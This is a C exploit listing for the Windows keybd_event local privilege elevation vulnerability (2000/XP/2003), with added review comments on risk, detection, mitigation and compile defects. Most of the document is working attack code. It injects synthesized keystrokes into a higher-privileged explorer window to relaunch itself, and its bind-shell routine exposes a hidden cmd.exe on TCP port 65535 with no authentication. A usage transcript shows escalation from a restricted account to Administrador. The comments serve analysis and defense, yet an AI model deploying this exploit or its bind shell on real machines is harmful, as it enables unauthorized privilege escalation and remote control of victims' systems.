MS Windows (keybd_event) Local Privilege Elevation Exploit
==========================================================
MS Windows (keybd_event) Local Privilege Elevation Exploit
==========================================================
/*
 * Microsoft Windows keybd_event validation vulnerability.
 * Local privilege elevation
 *
 * Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com )
 *          Iñaki Lopez ( ilo _@_ reversing.org )
 *
 * Platforms affected/tested:
 *
 *   - Windows 2000
 *   - Windows XP
 *   - Windows 2003
 *
 * Original Advisory: http://www.haxorcitos.com
 *                    http://www.reversing.org
 *
 * Exploit Date: 08 / 06 / 2005
 *
 * Original Advisory:
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 * Attack Scenario:
 *
 * a) An attacker who gains access to an unprivileged shell/application executed
 *    with the application runas.
 * b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP
 *
 * Impact:
 *
 * Due to an invalid keyboard input validation, it is possible to send keys to any
 * application of the Desktop.
 * By sending some short-cut keys it is possible to execute code and elevate privileges,
 * obtaining the logged-in user's privileges and bypassing the runas/service security
 * restriction.
 *
 * Exploit usage (console transcript, Spanish-locale Windows 2000):
 *
 * C:\>whoami
 * AQUARIUS\Administrador
 *
 * C:\>runas /user:restricted cmd.exe
 * Escribir contraseña para restricted:
 * Intentando iniciar "cmd.exe" como usuario "AQUARIUS\restricted"...
 *
 *
 * Microsoft Windows 2000 [Versión 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\WINNT\system32>cd \
 *
 * C:\>whoami
 * AQUARIUS\restricted
 *
 * C:\>tlist.exe |find "explorer.exe"
 * 1140 explorer.exe Program Manager
 *
 * C:\>c:\keybd.exe 1140
 * HANDLE Found. Attacking =)
 *
 * C:\>nc localhost 65535
 * Microsoft Windows 2000 [Versión 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\>whoami
 * whoami
 * AQUARIUS\Administrador
 *
 *
 * DONE =)
 */

/*
 * Review notes on this listing (code left exactly as published; comments only).
 *
 * Structure: main() selects one of two modes. With a PID argument it runs the
 * input-injection path (ExplorerExecution, via EnumWindows); with no arguments it
 * runs BindShell(). The text typed into the target desktop is argv[0] -- this
 * executable's own path -- so the window that receives the synthesized Win+R, path
 * and Enter (presumably the Run dialog) starts a second copy of this program in
 * no-argument mode, in the desktop user's security context.
 *
 * Risk: BindShell() binds INADDR_ANY:65535 and hands the accepted socket to cmd.exe
 * as stdin/stdout/stderr with no authentication of the client. The usage transcript
 * connects from localhost, but as written the listener is reachable from any host
 * that can reach the machine's TCP port 65535.
 *
 * Detection: an unexpected listener on TCP/65535 whose owning process spawns a hidden
 * cmd.exe with inherited socket handles; a non-interactive service or runas'd process
 * calling SetForegroundWindow/keybd_event against a window of a different process.
 *
 * Mitigation (general, not from this listing): do not run services with
 * "interact with desktop"; restrict who may run code in an interactive session;
 * host firewall rules for unexpected inbound ports. Windows releases after those
 * listed above added UI Privilege Isolation and session 0 isolation, which constrain
 * synthesized input across integrity levels/sessions -- confirm against the target
 * version rather than relying on this note.
 *
 * Compile/portability defects visible in the listing:
 *  - doFormatMessage() is called but never declared or defined here; this file
 *    does not link as shown.
 *  - ExplorerExecution is declared void but cast to WNDENUMPROC, whose callback is
 *    expected to return BOOL; the enumeration continues on an undefined return value.
 *  - void main() is non-standard; (long)(&console_wnd) truncates the pointer on
 *    64-bit builds (lParam is unused by the callback anyway).
 *  - closesocket(s) is called twice in BindShell() (once after accept, once at exit).
 *  - The literal in VkKeyScan('?') appears mis-encoded in this copy of the listing;
 *    the intended character cannot be recovered from the page.
 */

#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")

/* TCP port the no-argument mode listens on. */
#define HAXORCITOS 65535

/* Target process id (from argv[1]); read by the EnumWindows callback. */
unsigned int pid = 0;
/* Text typed into the target desktop; filled from argv[0]. Zero-initialized, and
 * main() copies at most sizeof(buf)-1 bytes, so it always stays NUL-terminated. */
char buf[256]="";

/**************************************************************/
/*
 * EnumWindows callback. For the first top-level window owned by process `pid`:
 * brings it to the foreground, synthesizes Win+R, types `buf` one character at a
 * time via keybd_event, presses Enter, then terminates this process with exit(1).
 * Windows belonging to other processes are ignored. lParam is not used.
 *
 * Note: returns void although WNDENUMPROC expects BOOL (see review notes above).
 */
void ExplorerExecution (HWND hwnd, LPARAM lParam){
    DWORD hwndid;
    int i;
    GetWindowThreadProcessId(hwnd,&hwndid);
    if (hwndid == pid){
        /* Replace keybd_event with SendMessage() and PostMessage() calls */
        printf("HANDLE Found. Attacking =)\n");
        SetForegroundWindow(hwnd);
        /* Win+R: press both, release both. */
        keybd_event(VK_LWIN,1,0,0);
        keybd_event(VkKeyScan('r'),1,0,0);
        keybd_event(VK_LWIN,1,KEYEVENTF_KEYUP,0);
        keybd_event(VkKeyScan('r'),1,KEYEVENTF_KEYUP,0);
        /* Type buf character by character. strlen(buf) is re-evaluated every
         * iteration and `i` is a signed int compared against size_t. */
        for(i=0;i<strlen(buf);i++) {
            if (buf[i]==':') {
                /* ':' is sent with Shift held. */
                keybd_event(VK_SHIFT,1,0,0);
                keybd_event(VkKeyScan(buf[i]),1,0,0);
                keybd_event(VK_SHIFT,1,KEYEVENTF_KEYUP,0);
                keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);
            } else {
                if (buf[i]=='\\') {
                    /* Backslash is sent as Alt+Ctrl plus a third key whose
                     * literal is mis-encoded in this copy (layout-specific;
                     * the transcript is a Spanish-locale system). */
                    keybd_event(VK_LMENU,1,0,0);
                    keybd_event(VK_CONTROL,1,0,0);
                    keybd_event(VkKeyScan('?'),1,0,0);
                    keybd_event(VK_LMENU,1,KEYEVENTF_KEYUP,0);
                    keybd_event(VK_CONTROL,1,KEYEVENTF_KEYUP,0);
                    keybd_event(VkKeyScan('?'),1,KEYEVENTF_KEYUP,0);
                } else {
                    keybd_event(VkKeyScan(buf[i]),1,0,0);
                    keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);
                }
            }
        }
        keybd_event(VK_RETURN,1,0,0);
        keybd_event(VK_RETURN,1,KEYEVENTF_KEYUP,0);
        /* Terminates the whole process from inside the enumeration. */
        exit(1);
    }
}

/**************************************************************/
/*
 * Listens on TCP port HAXORCITOS (65535) on all interfaces, accepts a single
 * connection, and starts a hidden cmd.exe whose stdin/stdout/stderr are the
 * accepted socket. Blocks until that cmd.exe exits.
 *
 * Returns -1 if bind/listen/CreateProcess fails, 1 otherwise; calls exit(1)
 * directly if WSAStartup or WSASocket fails. No client authentication of any kind.
 */
int BindShell(void) {
    //Bind Shell. Port 65535
    SOCKET s,s2;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    WSADATA HWSAdata;
    struct sockaddr_in sa;
    int len;
    if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) { exit(1); }
    if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){ exit(1); }
    sa.sin_family = AF_INET;
    sa.sin_port = (USHORT)htons(HAXORCITOS);
    /* INADDR_ANY: the listener is network-reachable, not loopback-only. */
    sa.sin_addr.s_addr = htonl(INADDR_ANY);
    len=sizeof(sa);
    if ( bind(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) { return(-1); }
    if ( listen(s, 1) == SOCKET_ERROR ) { return(-1); }
    /* accept() reuses `sa` for the peer address; the failure case
     * (INVALID_SOCKET) is not checked. */
    s2 = accept(s,(struct sockaddr *)&sa,&len);
    closesocket(s);
    ZeroMemory( &si, sizeof(si) );
    ZeroMemory( &pi, sizeof(pi) );
    si.cb = sizeof(si);
    si.wShowWindow = SW_HIDE;
    si.dwFlags =STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    /* The socket handle is inherited by the child as its three std handles
     * (bInheritHandles is TRUE in the CreateProcess call below). */
    si.hStdInput = (void *) s2; // SOCKET
    si.hStdOutput = (void *) s2;
    si.hStdError = (void *) s2;
    if (!CreateProcess( NULL ,"cmd.exe",NULL, NULL,TRUE, 0,NULL,NULL,&si,&pi)) {
        /* doFormatMessage is not defined anywhere in this listing. */
        doFormatMessage(GetLastError());
        return(-1);
    }
    WaitForSingleObject( pi.hProcess, INFINITE );
    /* `s` was already closed after accept(); this second closesocket(s) is
     * on a closed handle. pi.hProcess / pi.hThread are never closed. */
    closesocket(s);
    closesocket(s2);
    printf("SALIMOS...\n");
    Sleep(5000);
    return(1);
}

/**************************************************************/
/*
 * Entry point. With at least one argument: argv[1] is the target PID and argv[0]
 * (this executable's path) becomes the text to type; the window enumeration then
 * runs ExplorerExecution against every top-level window. With no arguments the
 * process acts as the listener (BindShell).
 *
 * atoi() gives no error reporting, so a non-numeric argument yields pid 0.
 * `void main` is non-standard and (long)(&console_wnd) truncates on 64-bit.
 */
void main(int argc, char* argv[]) {
    HWND console_wnd = NULL;
    if (argc >= 2) {
        pid = atoi (argv[1]);
        /* At most 255 bytes copied; buf[255] stays '\0' from its initializer. */
        strncpy(buf,argv[0],sizeof(buf)-1);
        EnumWindows((WNDENUMPROC)ExplorerExecution,(long)(&console_wnd));
    } else {
        BindShell();
    }
}
/**************************************************************/
# 0day.today [2024-12-24] #